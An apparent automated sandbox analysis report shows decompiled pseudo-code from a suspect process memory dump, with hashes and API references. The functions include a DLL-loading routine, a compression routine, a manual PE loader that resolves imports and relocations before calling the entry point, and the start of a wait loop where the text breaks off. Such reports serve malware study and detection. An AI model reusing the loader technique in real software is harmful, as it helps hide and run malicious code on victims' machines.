Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Strings

D, xrefs: 0008AA4F

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateHeapPipe$AllocateFreememset
String ID: D
API String ID: 2365139273-2746444292
Opcode ID: 6f0b75088f2de3f72156e0999c4a814b79d37797bc9ee56fa71e6c034334ef96
Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
Opcode Fuzzy Hash: 6f0b75088f2de3f72156e0999c4a814b79d37797bc9ee56fa71e6c034334ef96
Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61

Uniqueness

Uniqueness Score: -1.00%

Function 0008C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x9e688; // 0xb0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000895E1(_t50, 0xb62);
					_t66 =  *0x9e688; // 0xb0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
					_t20 =  *0x9e688; // 0xb0000
					asm("sbb eax, eax");
					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x9e688; // 0xb0000
					_t68 = E000892E5(_t26 + 0x1020);
					_v12 = _t68;
					E000885D5( &_v8);
					_t32 =  *0x9e688; // 0xb0000
					_t34 = E000892E5(_t32 + 0x122a);
					 *0x9e784 = _t34;
					_t35 =  *0x9e684; // 0xe9f8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x9e784);
					 *0x9e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0008E171(0x9bb48, _t60);
					}
					 *0x9e780 = _t38;
					E0008861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x9e780 != 0) {
						goto L10;
					} else {
						E0008861A(0x9e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x9e780 == 0) {
						_t46 =  *0x9e6bc; // 0xe9fa18
						 *0x9e780 = _t46;
					}
					L10:
					return 1;
				}
			}

0x0008c4ce
0x0008c4ce
0x0008c4ce
0x0008c4d1
0x0008c4dd
0x0008c4e8
0x0008c504
0x0008c509
0x0008c512
0x0008c514
0x0008c51c
0x0008c53d
0x0008c542
0x0008c54f
0x0008c55a
0x0008c561
0x0008c568
0x0008c579
0x0008c57f
0x0008c582
0x0008c599
0x0008c5a5
0x0008c5ad
0x0008c5b4
0x0008c5ba
0x0008c5c6
0x0008c5cc
0x0008c5d3
0x0008c5e6
0x0008c5d5
0x0008c5d5
0x0008c5d8
0x0008c5de
0x0008c5e3
0x0008c5e8
0x0008c5f3
0x0008c605
0x0008c617
0x00000000
0x0008c619
0x0008c620
0x00000000
0x0008c626
0x0008c627
0x0008c627
0x0008c62e
0x0008c630
0x0008c635
0x0008c635
0x0008c63a
0x0008c63e
0x0008c63e

APIs

LoadLibraryW.KERNEL32 ref: 0008C5C6
memset.MSVCRT ref: 0008C605

Strings

%08x, xrefs: 0008C52F
dll, xrefs: 0008C588

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 87e5f68a68811af9e61fea65288c3ec2a75dfa89854a5d60e79bb7a89bb2a2ff
Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
Opcode Fuzzy Hash: 87e5f68a68811af9e61fea65288c3ec2a75dfa89854a5d60e79bb7a89bb2a2ff
Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725

Uniqueness

Uniqueness Score: -1.00%

Function 00092D70, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00092D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E00095D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E00094AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E00094C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E00094AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x00092d76
0x00092d7b
0x00092d7f
0x00092d82
0x00092d82
0x00092d85
0x00092d8a
0x00092d8f
0x00092d92
0x00092d97
0x00092d9a
0x00092da0
0x00092da0
0x00092dab
0x00092dae
0x00092db5
0x00092dba
0x00000000
0x00000000
0x00092dc0
0x00092dc5
0x00092dc5
0x00092dca
0x00092dd0
0x00092dda
0x00092ddf
0x00092de5
0x00092e04
0x00092e07
0x00092e12
0x00092e12
0x00092e12
0x00092e09
0x00092e09
0x00092e0b
0x00000000
0x00092e0d
0x00092e0d
0x00092e0d
0x00092e0b
0x00092e1a
0x00092e1f
0x00092e24
0x00092e2a
0x00092e2e
0x00092e31
0x00092e34
0x00092e3a
0x00092e3f
0x00092e42
0x00092e48
0x00092e4d
0x00092e53
0x00092e59
0x00092e5e
0x00092e61
0x00092e66
0x00092e6a
0x00092e6e
0x00092e71
0x00092e74
0x00092e7d
0x00092e84
0x00092e87
0x00092e8a
0x00092e8f
0x00092e94
0x00092e97
0x00092e9a
0x00092e9a
0x00092e9e
0x00092ea7
0x00092eae
0x00092eb1
0x00092eb6
0x00092ebb
0x00092ebb
0x00092ebe
0x00092ec3
0x00000000
0x00000000
0x00092de7
0x00092de9
0x00092df6
0x00000000
0x00000000
0x00092df6
0x00092de9
0x00000000
0x00092de5
0x00092ec9
0x00092ece
0x00092ed1
0x00092ed4
0x00092f7f
0x00092f7f
0x00092eda
0x00092eda
0x00092eda
0x00092edf
0x00092f09
0x00092f0c
0x00092f0c
0x00092f11
0x00092f13
0x00092f15
0x00092f18
0x00092f1b
0x00092f23
0x00092f28
0x00092f28
0x00092f2e
0x00092f31
0x00092f34
0x00092f37
0x00092f39
0x00092f39
0x00092f3a
0x00092f3a
0x00092f37
0x00092f48
0x00092f4b
0x00092f4f
0x00092f54
0x00092f57
0x00092f5a
0x00092f5a
0x00092f5a
0x00092f5d
0x00092f5d
0x00092f60
0x00092f60
0x00092ee1
0x00092ee1
0x00092ef1
0x00092ef4
0x00092ef9
0x00092ef9
0x00092efc
0x00092eff
0x00092f02
0x00092f04
0x00092f04
0x00092f63
0x00092f65
0x00092f68
0x00092f68
0x00092f6e
0x00092f72
0x00092f75
0x00092f77
0x00092f77
0x00092f88
0x00092f8a
0x00092f8a
0x00092f92
0x00092fa0
0x00092fa3
0x00092fa5
0x00092fc5
0x00092fc5
0x00092fc8
0x00092fce
0x00092fcf
0x00092fd2
0x00092fd4
0x00092fd7
0x00092fda
0x00092fdd
0x00092fe1
0x00092fe4
0x00092fe7
0x00092fea
0x00092fec
0x00092fec
0x00092fef
0x00092ff1
0x00092ff1
0x00092ff4
0x00092ff6
0x00092ff9
0x00093001
0x00093004
0x00093009
0x00093009
0x0009300f
0x00093012
0x00093015
0x00093017
0x00093017
0x00093018
0x00093018
0x00093023
0x00093023
0x00093023
0x00093026
0x00093029
0x00093029
0x0009302c
0x0009302c
0x00092fef
0x0009302f
0x00093032
0x00093035
0x00093037
0x0009303a
0x0009303c
0x0009303f
0x00093042
0x00093044
0x00093047
0x0009304f
0x00093057
0x0009305a
0x0009305a
0x0009305a
0x0009305d
0x0009305d
0x0009305d
0x00093060
0x00093066
0x00093068
0x00093068
0x0009306e
0x00093074
0x0009307d
0x00093084
0x00093086
0x00093089
0x00093089
0x0009308c
0x0009308c
0x0009308f
0x00093091
0x00093094
0x00093096
0x000930b1
0x000930b1
0x000930b5
0x000930b8
0x000930bb
0x000930be
0x000930d4
0x000930d4
0x000930d4
0x000930c0
0x000930c0
0x000930c2
0x000930c6
0x000930c9
0x00000000
0x000930cb
0x000930cb
0x000930cd
0x00000000
0x000930cf
0x000930cf
0x000930cf
0x000930cd
0x000930c9
0x000930d8
0x000930db
0x000930e0
0x000930ea
0x000930ea
0x000930ea
0x000930ed
0x00093098
0x00093098
0x0009309a
0x000930a1
0x000930a1
0x000930a3
0x000930a5
0x000930a7
0x000930ab
0x000930ad
0x000930af
0x00000000
0x00000000
0x000930af
0x000930ab
0x0009309c
0x0009309c
0x0009309f
0x00000000
0x00000000
0x0009309f
0x0009309a
0x000930f7
0x000930f9
0x000930f9
0x00093104
0x00092fa7
0x00092fa7
0x00092faa
0x00000000
0x00092fac
0x00092fac
0x00092fae
0x00092fb2
0x00000000
0x00092fb4
0x00092fb4
0x00092fb4
0x00092fb7
0x00000000
0x00092fbb
0x00092fc4
0x00092fc4
0x00092fb7
0x00092fb2
0x00092faa
0x00092f96
0x00092f9f
0x00092f9f

APIs

memcpy.MSVCRT ref: 00092E7D
memcpy.MSVCRT ref: 00092EF4
memcpy.MSVCRT ref: 00092F23
memcpy.MSVCRT ref: 00092F4F
memcpy.MSVCRT ref: 00093004

Part of subcall function 00095D90: memcpy.MSVCRT ref: 00095E6E

Part of subcall function 00094AF0: memcpy.MSVCRT ref: 00094B1A

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54

Uniqueness

Uniqueness Score: -1.00%

Function 00092AEC, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

0x00092afb
0x00092b01
0x00092b0a
0x00092b0d
0x00092b10
0x00000000
0x00092c01
0x00092c05
0x00092c07
0x00092c15
0x00092d33
0x00092d3c
0x00092d3f
0x00092d43
0x00092d49
0x00092d51
0x00092d51
0x00092d59
0x00000000
0x00092d64
0x00092c1b
0x00092c24
0x00092c32
0x00092c35
0x00092c52
0x00092c59
0x00092c6b
0x00092c6b
0x00092c72
0x00092c82
0x00092c9a
0x00092c84
0x00092c8c
0x00092c8c
0x00092c9d
0x00092ca1
0x00092cb1
0x00092cd4
0x00092ce6
0x00092cb3
0x00092cc7
0x00092cc7
0x00092cf0
0x00092d0c
0x00092cf2
0x00092d01
0x00092d01
0x00092d14
0x00092d1d
0x00092d1d
0x00092d2b
0x00000000
0x00092c74
0x00092c76
0x00000000
0x00092c76
0x00092c72
0x00000000
0x00092c35
0x00092b18
0x00092b26
0x00092b2b
0x00092b36
0x00092b39
0x00092b3d
0x00092b3f
0x00092b4f
0x00092b58
0x00092b61
0x00092b69
0x00092b72
0x00092b7d
0x00092b83
0x00092b86
0x00092b89
0x00092b90
0x00092b97
0x00000000
0x00000000
0x00092ba2
0x00092bb0
0x00092bbb
0x00092bc5
0x00092bdd
0x00092bea
0x00092bea
0x00092bc7
0x00092bd2
0x00092bd2
0x00092bf1
0x00092bf1
0x00092bf9
0x00092bf9
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 00092C4C
LoadLibraryA.KERNEL32(?), ref: 00092C65
GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00081C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x9e6dc; // 0x1d8
				_t13 = E0008A4BF(_t41, 0);
				while(_t13 < 0) {
					E0008980C( &_v28);
					_t43 =  *0x9e6e0; // 0x0
					_t15 =  *0x9e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x9e684; // 0xe9f8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x9e684; // 0xe9f8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x9e6dc; // 0x1d8
						__eflags = 0;
